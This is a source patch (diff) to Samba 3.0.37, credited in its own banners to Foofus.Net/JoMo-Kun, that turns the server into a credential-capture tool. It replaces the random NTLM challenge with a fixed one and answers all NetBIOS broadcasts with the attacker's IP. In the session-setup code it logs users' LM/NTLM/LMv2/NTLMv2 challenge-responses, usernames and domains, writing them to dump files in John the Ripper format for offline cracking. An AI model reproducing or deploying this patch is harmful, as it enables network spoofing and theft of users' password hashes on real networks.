diff -rubN samba-3.0.37/source/auth/auth.c samba-3.0.37-jmk/source/auth/auth.c
--- samba-3.0.37/source/auth/auth.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/auth/auth.c	2010-02-10 15:53:06.779889636 -0600
@@ -124,14 +124,19 @@
 	}
 	
 	if (!challenge_set_by) {
-		uchar chal[8];
+		uchar chal[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };
+		int i;
 		
-		generate_random_buffer(chal, sizeof(chal));
 		auth_context->challenge = data_blob_talloc(auth_context->mem_ctx, 
 							   chal, sizeof(chal));
 		
-		challenge_set_by = "random";
-		auth_context->challenge_may_be_modified = True;
+    challenge_set_by = "jmk";
+    auth_context->challenge_may_be_modified = False;
+    DEBUG(0, ("*** Fixed LM/NTLM Challenge Samba Attack -- Foofus.Net/JoMo-Kun ***\n")); 
+    DEBUGADD(0, ("[%s] Set server challenge: ", client_addr()));
+    for (i=0; i<auth_context->challenge.length; i++)
+      DEBUGADD(0, ("%2.2X", 0xFF & (int)auth_context->challenge.data[i]));
+    DEBUGADD(0, ("\n"));
 	} 
 	
 	DEBUG(5, ("auth_context challenge created by %s\n", challenge_set_by));
diff -rubN samba-3.0.37/source/nmbd/nmbd.c samba-3.0.37-jmk/source/nmbd/nmbd.c
--- samba-3.0.37/source/nmbd/nmbd.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/nmbd/nmbd.c	2010-02-10 15:53:06.779889636 -0600
@@ -722,6 +722,9 @@
 
 	DEBUG( 0, ( "Netbios nameserver version %s started.\n", SAMBA_VERSION_STRING) );
 	DEBUGADD( 0, ( "%s\n", COPYRIGHT_STARTUP_MESSAGE ) );
+  DEBUGADD(0, ("\n----------------------------------------------------------\n"));
+  DEBUGADD(0, ("*** NMB Broadcast Auto-Response -- Foofus.Net/JoMo-Kun ***\n"));
+  DEBUGADD(0, ("----------------------------------------------------------\n\n"));
 
 	if ( !reload_nmbd_services(False) )
 		return(-1);
diff -rubN samba-3.0.37/source/nmbd/nmbd_incomingrequests.c samba-3.0.37-jmk/source/nmbd/nmbd_incomingrequests.c
--- samba-3.0.37/source/nmbd/nmbd_incomingrequests.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/nmbd/nmbd_incomingrequests.c	2010-02-11 13:07:23.926474545 -0600
@@ -449,18 +449,55 @@
 	struct name_record *namerec = NULL;
 	int reply_data_len = 0;
 	int i;
+  int num_ips;	
 	
 	DEBUG(3,("process_name_query_request: Name query from %s on subnet %s for name %s\n", 
 		 inet_ntoa(p->ip), subrec->subnet_name, nmb_namestr(question)));
   
+  /* ********************************************************************************* */
+  /* 
+     Hack to make nmbd respond with our IP for all NMB broadcasts.
+     Based on ideas from Karma (http://www.theta44.org/karma/). 
+     JoMo-Kun <jmk@foofus.net> [02/2007]
+  */
+ 
 	/* Look up the name in the cache - if the request is a broadcast request that
 	   came from a subnet we don't know about then search all the broadcast subnets
 	   for a match (as we don't know what interface the request came in on). */
 
+  /*
 	if(subrec == remote_broadcast_subnet)
 		namerec = find_name_for_remote_broadcast_subnet( question, FIND_ANY_NAME);
 	else
 		namerec = find_name_on_subnet(subrec, question, FIND_ANY_NAME);
+  */
+
+  /* Create Response Packet */
+  DEBUGADD(0, ("[%s] NetBIOS Broadcast Request: %s\n", inet_ntoa(p->ip), question->name) );
+
+  /* Don't respond to broadcasts which match our ignore list */
+  //if ( strcmp(inet_ntoa(p->ip), "10.71.0.160") == 0 )
+  //{
+  //  DEBUGADD(0, ("[%s] Skipping NetBIOS Broadcast Request based on host ignore list.\n", inet_ntoa(p->ip)) );
+  //  namerec = NULL;
+  //}
+  //else
+  //{
+    namerec = SMB_MALLOC_P(struct name_record);
+    memset( (char *)namerec, '\0', sizeof(*namerec) );
+    namerec->subnet = subrec;
+    make_nmb_name(&namerec->name, question->name, 0x00);
+    namerec->data.nb_flags = NB_ACTIVE;
+    namerec->data.wins_flags = WINS_ACTIVE;
+    namerec->data.nb_flags = NB_PERM;
+    namerec->data.source = SELF_NAME;
+    num_ips = iface_count(); 
+    namerec->data.num_ips = num_ips;
+    namerec->data.ip = SMB_MALLOC_ARRAY( struct in_addr, num_ips );
+    memcpy( (namerec->data.ip), &subrec->myip, num_ips * sizeof(struct in_addr) );
+  //}
+
+  /* ********************************************************************************* */
 
 	/* Check if it is a name that expired */
 	if (namerec && 
diff -rubN samba-3.0.37/source/smbd/negprot.c samba-3.0.37-jmk/source/smbd/negprot.c
--- samba-3.0.37/source/smbd/negprot.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/smbd/negprot.c	2010-02-10 15:53:06.779889636 -0600
@@ -349,6 +349,7 @@
 		p += srvstr_push(outbuf, p, lp_workgroup(), BUFFER_SIZE - (p-outbuf), 
 				 STR_UNICODE|STR_TERMINATE|STR_NOALIGN);
 		DEBUG(3,("not using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Disabled.\n", client_addr()));
 	} else {
 		DATA_BLOB spnego_blob = negprot_spnego();
 
@@ -362,6 +363,7 @@
 
 		SCVAL(outbuf,smb_vwv16+1, 0);
 		DEBUG(3,("using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Enabled (NTLMv2).\n", client_addr()));
 	}
 	
 	SSVAL(outbuf,smb_vwv17, p - q); /* length of challenge+domain strings */
@@ -604,8 +606,9 @@
 		reload_services(True);          
 		outsize = supported_protocols[protocol].proto_reply_fn(inbuf, outbuf);
 		DEBUG(3,("Selected protocol %s\n",supported_protocols[protocol].proto_name));
+		DEBUGADD(0,("[%s] Selected protocol: %s\n", client_addr(), supported_protocols[protocol].proto_name));
 	} else {
-		DEBUG(0,("No protocol supported !\n"));
+		DEBUG(0,("[%s] No protocol supported !\n", client_addr()));
 	}
 	SSVAL(outbuf,smb_vwv0,choice);
   
diff -rubN samba-3.0.37/source/smbd/reply.c samba-3.0.37-jmk/source/smbd/reply.c
--- samba-3.0.37/source/smbd/reply.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/smbd/reply.c	2010-02-10 15:53:06.779889636 -0600
@@ -323,6 +323,9 @@
 		DEBUG(2,("netbios connect: name1=%s name2=%s\n",
 			 name1,name2));      
 
+    DEBUGADD(0, ("[%s] Server NetBIOS Name: %s\n", client_addr(), name1));
+    DEBUGADD(0, ("[%s] Client NetBIOS Name: %s\n", client_addr(), name2));
+
 		set_local_machine_name(name1, True);
 		set_remote_machine_name(name2, True);
 
@@ -503,6 +506,7 @@
 		
 	p += srvstr_pull(inbuf, client_devicetype, p, sizeof(client_devicetype), 6, STR_ASCII);
 
+  DEBUGADD(0, ("[%s] Device Type: %s Share: %s\n", client_addr(), client_devicetype, service));
 	DEBUG(4,("Client requested device type [%s] for share [%s]\n", client_devicetype, service));
 
 	conn = make_connection(service,password,client_devicetype,vuid,&nt_status);
diff -rubN samba-3.0.37/source/smbd/sesssetup.c samba-3.0.37-jmk/source/smbd/sesssetup.c
--- samba-3.0.37/source/smbd/sesssetup.c	2009-09-30 07:21:56.000000000 -0500
+++ samba-3.0.37-jmk/source/smbd/sesssetup.c	2010-02-10 22:38:04.296497206 -0600
@@ -1302,7 +1302,12 @@
 		char *p = smb_buf(inbuf);    
 		char *save_p = smb_buf(inbuf);
 		uint16 byte_count;
-			
+		int i;	
+		int chars_to_copy = 0;	
+		char *pathname;
+		char *filename;
+		char *tempname;
+		FILE *fp;
 
 		if(global_client_caps == 0) {
 			global_client_caps = IVAL(inbuf,smb_vwv11);
@@ -1358,6 +1363,48 @@
 		if (doencrypt) {
 			lm_resp = data_blob(p, passlen1);
 			nt_resp = data_blob(p+passlen1, passlen2);
+
+      if (passlen2 > 24) /* LMv2 */
+      {
+        DEBUGADD(0, ("[%s] LM Client Response: ", client_addr()));
+        for (i=0; i<16; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+   
+        DEBUGADD(0, ("\n[%s] LM Client Challenge: ", client_addr()));
+        for (i=16; i<passlen1; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+   
+        DEBUGADD(0, ("\n"));
+      }
+      else /* LM */ 
+      {
+        DEBUGADD(0, ("[%s] LM Client Response: ", client_addr()));
+        for (i=0; i<passlen1; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+      
+        DEBUGADD(0, ("\n"));
+      }
+
+      if (passlen2 > 24)  /* NTLMv2 */ 
+      {
+        DEBUGADD(0, ("[%s] NT Client Response: ", client_addr()));
+        for (i=0; i<16; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+   
+        DEBUGADD(0, ("\n[%s] NT Client Challenge: ", client_addr()));
+        for (i=16; i<passlen2; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+
+       DEBUGADD(0, ("\n"));
+      }
+      else /* NTLM */
+      {
+        DEBUGADD(0, ("[%s] NT Client Response: ", client_addr()));
+        for (i=0; i<passlen2; i++)
+          DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+        
+        DEBUGADD(0, ("\n"));
+      }
 		} else {
 			pstring pass;
 			BOOL unic=SVAL(inbuf, smb_flg2) & FLAGS2_UNICODE_STRINGS;
@@ -1400,6 +1447,155 @@
 		else 
 			fstrcpy( primary_domain, "null" );
 
+    DEBUGADD(0, ("[%s] Client Name: %s Remote Machine Name: %s\n", client_addr(), client_name(), get_remote_machine_name()));
+    DEBUGADD(0, ("[%s] User: %s\n", client_addr(), user));
+    DEBUGADD(0, ("[%s] Domain: %s\n", client_addr(), domain));
+    DEBUGADD(0, ("[%s] Primary Domain: %s\n", client_addr(), primary_domain));
+    DEBUGADD(0, ("[%s] Native OS: %s\n", client_addr(), native_os));
+    DEBUGADD(0, ("[%s] Native LanMan: %s\n", client_addr(), native_lanman));
+
+    /* Log LM/NTLM/LMv2/NTLMv2 Challenge/Response in John Format */
+    if ( doencrypt ) {
+      DEBUGADD(0,("\n*** Logging LM/NTLM/LMv2/NTLMv2 Challenge/Response Exchanges to File (John/jtr Format) ***\n"));
+
+      /* Set Logging Path */
+      if ( strlen(lp_logfile()) != 0 )
+      {
+        filename = lp_logfile();
+        tempname = strrchr(filename, '/');
+        pathname = malloc(tempname - filename + 1);
+        memset(pathname, 0, tempname - filename + 1);
+        strncpy(pathname, filename, tempname - filename);
+      }
+      else
+      {
+        pathname = malloc(5);
+        memset(pathname, 0, 5);
+        snprintf(pathname, 4, "/tmp");
+      }
+
+      /* Set Log File Name */
+      if ((lm_resp.length == 24) && (nt_resp.length != 24))
+      {
+        /* Windows 7 LMv2 Response: 00000000000000000000000000000000 */
+        if (lm_resp.data[0] == 0x00) /* Extract NTLMv2 */
+        {
+          filename = malloc(strlen(pathname) + 15 + 1);
+          memset(filename, 0, strlen(pathname) + 15 + 1);
+          snprintf(filename, strlen(pathname) + 15 + 1, "%s/dump.NETNTLMv2", pathname);
+        }
+        else /* Extract LMv2 */
+        {
+          filename = malloc(strlen(pathname) + 13 + 1);
+          memset(filename, 0, strlen(pathname) + 13 + 1);
+          snprintf(filename, strlen(pathname) + 13 + 1, "%s/dump.NETLMv2", pathname);
+        }
+      }
+      else if ((lm_resp.length == 24) && (nt_resp.length == 24))
+      {
+        filename = malloc(strlen(pathname) + 11 + 1);
+        memset(filename, 0, strlen(pathname) + 11 + 1);
+        snprintf(filename, strlen(pathname) + 11 + 1, "%s/dump.NETLM", pathname);
+      }
+      else
+      {
+        DEBUGADD(0,("Failed to identify LM/NTLM/LMv2/NTLMv2 hashes based on length.\n"));
+        filename = NULL;
+      }
+
+      DEBUGADD(0,("Set LM/NTLM/LMv2/NTLMv2 Dump File:%s\n", filename));
+      free(pathname);
+
+      fp = fopen(filename, "a");
+      if (fp == NULL) {
+        DEBUGADD(0, ("Failed to Open Dump File.\n"));
+      }
+      /* Log LMv2/NTLMv2 Challenge/Response */
+      /* USER::DOMAIN:1122334455667788:498B5E245BAFA65E56334B28E3F501CF:6FE8BB5B66ED5892 */
+      else if ((lm_resp.length == 24) && (nt_resp.length != 24))
+      {
+        DEBUGADD(0,("Dumping LMv2/NTLMv2 Response\n"));
+        
+        /* Client Username */
+        fprintf(fp, "%s::", user);
+
+        /* Client Domain */
+        if (strlen(domain) != 0)
+          fprintf(fp, "%s:", domain);
+        else
+          fprintf(fp, ":");
+    
+        /* Fixed Server Challenge */
+        fprintf(fp, "1122334455667788:");
+
+        /* Windows 7 LMv2 Response: 00000000000000000000000000000000 -- Record NTLMv2 Instead */
+        if (lm_resp.data[0] == 0x00)
+        {
+          /* CLient NTLMv2 Response */
+          for (i=0; i<16; i++)
+            fprintf(fp, "%2.2X", (0xFF & (int)nt_resp.data[i]));
+ 
+          fprintf(fp, ":"); 
+
+          /* Client NTLMv2 Challenge */
+          for (i=16; i<passlen2;i++)
+            fprintf(fp, "%2.2X", (0xFF & (int)nt_resp.data[i]));
+        }
+        else
+        {
+          /* CLient LMv2 Response */
+          for (i=0; i<16; i++)
+            fprintf(fp, "%2.2X", (0xFF & (int)lm_resp.data[i]));
+    
+          fprintf(fp, ":"); 
+
+          /* Client LMv2 Challenge */
+          for (i=16; i<passlen1;i++)
+            fprintf(fp, "%2.2X", (0xFF & (int)lm_resp.data[i]));
+        }
+
+        fprintf(fp, "\n");
+
+        fclose(fp);
+      }
+      /* Log LM/NTLM Challenge/Response */
+      /* USER::DOMAIN:1122334455667788:E70F85C227FB0ED25AAE68715B54FA4E:BFC5ACEC40927AEF */
+      else if ((lm_resp.length == 24) && (nt_resp.length == 24))
+      {
+        DEBUGADD(0,("Dumping LM/NTLM Response\n"));
+
+        /* Client Username */
+        fprintf(fp, "%s::", user);
+
+        /* Client Domain */
+        if (strlen(domain) != 0)
+          fprintf(fp, "%s:", domain);
+        else
+          fprintf(fp, ":");
+    
+        /* Client LM Response */
+        for (i=0; i<passlen1; i++)
+          fprintf(fp,"%2.2X", 0xFF & (int)lm_resp.data[i] );
+       
+        fprintf(fp, ":"); 
+        
+        /* Client NTLM Response */
+        for (i=0; i<passlen1; i++)
+          fprintf(fp,"%2.2X", 0xFF & (int)nt_resp.data[i] );
+        
+        /* Fixed Server Challenge */
+        fprintf(fp, ":1122334455667788\n");
+
+        fclose(fp);
+      }
+       
+      DEBUGADD(0, ("\n*** Completed Dumping Challenge/Response ***\n"));
+    }
+    else
+      DEBUGADD(0, ("\n*** Memory Allocation Failure! ***\n"));
+    
+    /* response dumping code ends */
+
 		DEBUG(3,("Domain=[%s]  NativeOS=[%s] NativeLanMan=[%s] PrimaryDomain=[%s]\n",
 			 domain, native_os, native_lanman, primary_domain));